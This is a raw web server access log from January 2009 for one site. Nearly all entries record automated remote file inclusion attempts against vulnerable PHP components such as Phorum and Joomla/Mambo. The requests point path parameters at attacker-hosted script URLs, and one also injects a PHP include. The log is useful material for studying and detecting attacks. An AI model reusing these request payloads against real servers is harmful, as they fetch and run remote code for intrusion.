222.236.47.182 - - [04/Jan/2009:08:58:59 -0800] "GET /logs/access_081111.log//phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://spikeweblist.altervista.org/rulez/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
222.236.47.182 - - [04/Jan/2009:08:59:00 -0800] "GET /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://spikeweblist.altervista.org/rulez/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.195.185.194 - - [04/Jan/2009:08:59:03 -0800] "GET /logs/access_080523.log///components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.127.253.111 - - [04/Jan/2009:08:59:11 -0800] "GET /logs/access_081111.log//phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.127.253.111 - - [04/Jan/2009:08:59:12 -0800] "GET /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.127.253.111 - - [04/Jan/2009:08:59:12 -0800] "GET /logs//phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:59:24 -0800] "GET /logs/access_080714.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
222.236.47.182 - - [04/Jan/2009:08:59:31 -0800] "GET /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://spikeweblist.altervista.org/rulez/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:59:33 -0800] "GET /logs/access_080714.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:59:33 -0800] "GET /logs/access_080714.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
66.7.194.31 - - [04/Jan/2009:08:59:33 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.7.194.31 - - [04/Jan/2009:08:59:34 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.14.80.68 - - [04/Jan/2009:08:59:41 -0800] "GET /logs/access_080512.log%20//library/lib.php?root=http://www.karensscrappin.com.au/moodledata/1/recipefolio/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.14.80.68 - - [04/Jan/2009:08:59:41 -0800] "GET /logs/access_071224.log%20//library/lib.php?root=http://www.karensscrappin.com.au/moodledata/1/recipefolio/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
148.245.102.115 - - [04/Jan/2009:08:59:50 -0800] "GET /logs/access_080513.log//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
148.245.102.115 - - [04/Jan/2009:08:59:50 -0800] "GET /logs/access_080401.log//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
148.245.102.115 - - [04/Jan/2009:08:59:50 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
148.245.102.115 - - [04/Jan/2009:08:59:50 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.75.107 - - [04/Jan/2009:08:59:50 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.75.107 - - [04/Jan/2009:08:59:51 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.54.154.10 - - [04/Jan/2009:08:59:52 -0800] "GET /logs/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.54.154.10 - - [04/Jan/2009:08:59:53 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.54.154.10 - - [04/Jan/2009:08:59:57 -0800] "GET /logs/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:59:58 -0800] "GET /logs/access.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
200.54.154.10 - - [04/Jan/2009:08:59:58 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.102.198 - - [04/Jan/2009:09:00:00 -0800] "GET /logs//apboard/main.php//_test_holidays.php?APB_rp=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
87.106.102.198 - - [04/Jan/2009:09:00:00 -0800] "GET /logs/access_081212.log//apboard/main.php//_test_holidays.php?APB_rp=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
87.106.102.198 - - [04/Jan/2009:09:00:00 -0800] "GET /apboard/main.php//_test_holidays.php?APB_rp=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
212.34.184.239 - - [04/Jan/2009:09:00:09 -0800] "GET /logs/access_080216.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.alternativesud.com/ressources/cms/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.160.117.157 - - [04/Jan/2009:09:00:16 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.160.117.157 - - [04/Jan/2009:09:00:16 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.160.117.157 - - [04/Jan/2009:09:00:16 -0800] "GET /logs/access_080509.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.160.117.157 - - [04/Jan/2009:09:00:16 -0800] "GET /logs/access_080205.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
81.84.243.81 - - [04/Jan/2009:09:00:25 -0800] "GET /logs/access_080912.log//phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.236.47.182 - - [04/Jan/2009:09:00:27 -0800] "GET /logs/access_081111.log//phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://spikeweblist.altervista.org/rulez/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.102.198 - - [04/Jan/2009:09:00:27 -0800] "GET /logs/access_080522.log//apboard/main.php//_test_holidays.php?APB_rp=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
222.236.47.182 - - [04/Jan/2009:09:00:27 -0800] "GET /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://spikeweblist.altervista.org/rulez/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.182 - - [04/Jan/2009:09:00:28 -0800] "GET /logs//phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://spikeweblist.altervista.org/rulez/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.182 - - [04/Jan/2009:09:00:31 -0800] "GET /logs/access_080912.log//phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://spikeweblist.altervista.org/rulez/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
62.127.253.111 - - [04/Jan/2009:09:00:33 -0800] "GET /logs/access_080912.log//phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.51.146 - - [04/Jan/2009:09:00:49 -0800] "GET /logs/access_080204.log//index2.php?mosConfig_absolute_path=http://www.giovaniemissione.it/media/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
85.214.51.146 - - [04/Jan/2009:09:00:49 -0800] "GET /index2.php?mosConfig_absolute_path=http://www.giovaniemissione.it/media/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
85.214.51.146 - - [04/Jan/2009:09:00:49 -0800] "GET /logs//index2.php?mosConfig_absolute_path=http://www.giovaniemissione.it/media/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
85.214.51.146 - - [04/Jan/2009:09:00:49 -0800] "GET /logs/access_080614.log//index2.php?mosConfig_absolute_path=http://www.giovaniemissione.it/media/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:00:54 -0800] "GET /logs/access.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
190.3.25.99 - - [04/Jan/2009:09:00:57 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.3.25.99 - - [04/Jan/2009:09:00:57 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.54.154.10 - - [04/Jan/2009:09:01:03 -0800] "GET /logs/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.54.154.10 - - [04/Jan/2009:09:01:03 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.98.75.107 - - [04/Jan/2009:09:01:04 -0800] "GET /logs/access_081001.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.75.107 - - [04/Jan/2009:09:01:05 -0800] "GET /logs/access_080830.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.194.31 - - [04/Jan/2009:09:01:07 -0800] "GET /logs/access_080830.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.7.194.31 - - [04/Jan/2009:09:01:07 -0800] "GET /logs/access_081001.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.245.195.69 - - [04/Jan/2009:09:01:23 -0800] "GET /logs/access_081118.log/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:01:40 -0800] "GET /logs/access.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
65.98.75.107 - - [04/Jan/2009:09:01:51 -0800] "GET /logs/access_080507.log%20/phphtml.php?htmlclass_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.122.203.139 - - [04/Jan/2009:09:02:03 -0800] "GET /logs/access_081111.log//phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.122.203.139 - - [04/Jan/2009:09:02:03 -0800] "GET /logs//phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.122.203.139 - - [04/Jan/2009:09:02:03 -0800] "GET /logs/access_080912.log//phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.122.203.139 - - [04/Jan/2009:09:02:03 -0800] "GET /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:09:02:19 -0800] "GET /logs//library/editor/editor.php?root=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:09:02:19 -0800] "GET /library/editor/editor.php?root=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.195.69 - - [04/Jan/2009:09:02:27 -0800] "GET /logs/access_081114.log/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
190.128.163.42 - - [04/Jan/2009:09:02:29 -0800] "GET /logs/access_080426.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://spotlyrics.com/db/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.51.146 - - [04/Jan/2009:09:03:02 -0800] "GET /logs/access_080213.log//index2.php?mosConfig_absolute_path=http://www.giovaniemissione.it/media/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
85.214.51.146 - - [04/Jan/2009:09:03:02 -0800] "GET /logs/access_080203.log//index2.php?mosConfig_absolute_path=http://www.giovaniemissione.it/media/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:09:03:09 -0800] "GET /logs//library/lib.php?root=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:09:03:09 -0800] "GET /library/lib.php?root=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.98.188.22 - - [04/Jan/2009:09:03:11 -0800] "GET /logs/access_081212.log//apboard/main.php//_test_holidays.php?APB_rp=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
66.98.188.22 - - [04/Jan/2009:09:03:11 -0800] "GET /apboard/main.php//_test_holidays.php?APB_rp=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
66.98.188.22 - - [04/Jan/2009:09:03:11 -0800] "GET /logs//apboard/main.php//_test_holidays.php?APB_rp=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
85.214.51.146 - - [04/Jan/2009:09:03:13 -0800] "GET /logs/access_080204.log//index2.php?mosConfig_absolute_path=http://www.giovaniemissione.it/media/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
85.214.51.146 - - [04/Jan/2009:09:03:13 -0800] "GET /index2.php?mosConfig_absolute_path=http://www.giovaniemissione.it/media/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
85.214.51.146 - - [04/Jan/2009:09:03:13 -0800] "GET /logs//index2.php?mosConfig_absolute_path=http://www.giovaniemissione.it/media/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
85.214.51.146 - - [04/Jan/2009:09:03:13 -0800] "GET /logs/access_080614.log//index2.php?mosConfig_absolute_path=http://www.giovaniemissione.it/media/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
62.127.253.111 - - [04/Jan/2009:09:03:22 -0800] "GET /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.23.7.173 - - [04/Jan/2009:09:03:29 -0800] "GET /?mosConfig_absolute_pathhttp://conexionw.com/.../.thumb/image.txt??? HTTP/1.1" 200 94732 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
81.84.243.81 - - [04/Jan/2009:09:03:32 -0800] "GET /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.236.47.182 - - [04/Jan/2009:09:03:52 -0800] "GET /logs/access_080912.log//phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://spikeweblist.altervista.org/rulez/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.8.172.68 - - [04/Jan/2009:09:04:08 -0800] "GET /?mosConfig_absolute_pathhttp://conexionw.com/.../.thumb/image.txt??? HTTP/1.1" 200 94716 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
207.58.181.74 - - [04/Jan/2009:09:04:22 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.csjh.tpc.edu.tw/~sw/board/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.181.74 - - [04/Jan/2009:09:04:22 -0800] "GET /logs/access_080507.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.csjh.tpc.edu.tw/~sw/board/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.181.74 - - [04/Jan/2009:09:04:23 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.csjh.tpc.edu.tw/~sw/board/idbr.txt??? HTTP/1.1" 200 3711 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.75.107 - - [04/Jan/2009:09:04:23 -0800] "GET /logs/access_080830.log%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.36.39.203 - - [04/Jan/2009:09:04:24 -0800] "GET /logs///administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.53.78 - - [04/Jan/2009:09:04:26 -0800] "GET /logs/access_080808.log///bemarket/postscript/postscript.php?p_mode=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.181.74 - - [04/Jan/2009:09:04:28 -0800] "GET /logs/access_080705.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.csjh.tpc.edu.tw/~sw/board/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.75.107 - - [04/Jan/2009:09:04:29 -0800] "GET /logs/access_080620.log%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.98.188.22 - - [04/Jan/2009:09:04:31 -0800] "GET /logs/access_080522.log//apboard/main.php//_test_holidays.php?APB_rp=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
89.36.39.203 - - [04/Jan/2009:09:04:31 -0800] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.7.194.31 - - [04/Jan/2009:09:04:42 -0800] "GET /logs/access_080830.log%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:09:05:19 -0800] "GET /logs///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:09:05:19 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.214.51.146 - - [04/Jan/2009:09:05:22 -0800] "GET /logs/access_080213.log//index2.php?mosConfig_absolute_path=http://www.giovaniemissione.it/media/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
85.214.51.146 - - [04/Jan/2009:09:05:22 -0800] "GET /logs/access_080203.log//index2.php?mosConfig_absolute_path=http://www.giovaniemissione.it/media/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
216.153.214.235 - - [04/Jan/2009:09:05:25 -0800] "GET /logs/access_080430.log//?path%5Bdocroot%5D=http://rostrum56.ingeraldton.com/mutcp/read.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.153.214.235 - - [04/Jan/2009:09:05:26 -0800] "GET /logs//?path%5Bdocroot%5D=http://rostrum56.ingeraldton.com/mutcp/read.txt??%0D?? HTTP/1.1" 200 80891 "-" "libwww-perl/5.805" "www.dmulk.com"
216.153.214.235 - - [04/Jan/2009:09:05:27 -0800] "GET /?path%5Bdocroot%5D=http://rostrum56.ingeraldton.com/mutcp/read.txt??%0D?? HTTP/1.1" 200 94896 "-" "libwww-perl/5.805" "www.dmulk.com"
216.153.214.235 - - [04/Jan/2009:09:05:27 -0800] "GET /logs/access_080304.log//?path%5Bdocroot%5D=http://rostrum56.ingeraldton.com/mutcp/read.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.194.31 - - [04/Jan/2009:09:05:39 -0800] "GET /logs/access_080620.log%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
94.76.199.10 - - [04/Jan/2009:09:05:40 -0800] "GET /logs/access_080711.log HTTP/1.1" 200 2821755 "http://www.dmulk.com/logs/access_080711.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
190.196.5.189 - - [04/Jan/2009:09:05:50 -0800] "GET /logs/access_080115.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.alternativesud.com/ressources/cms/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
